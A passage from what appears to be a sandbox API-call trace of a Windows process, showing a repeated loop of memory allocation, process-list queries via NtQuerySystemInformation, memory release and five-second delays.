ResultLength=0x0) returned 0x0 [0224.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.640] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.701] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.716] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.774] NtAllocateVirtualMemory (in: 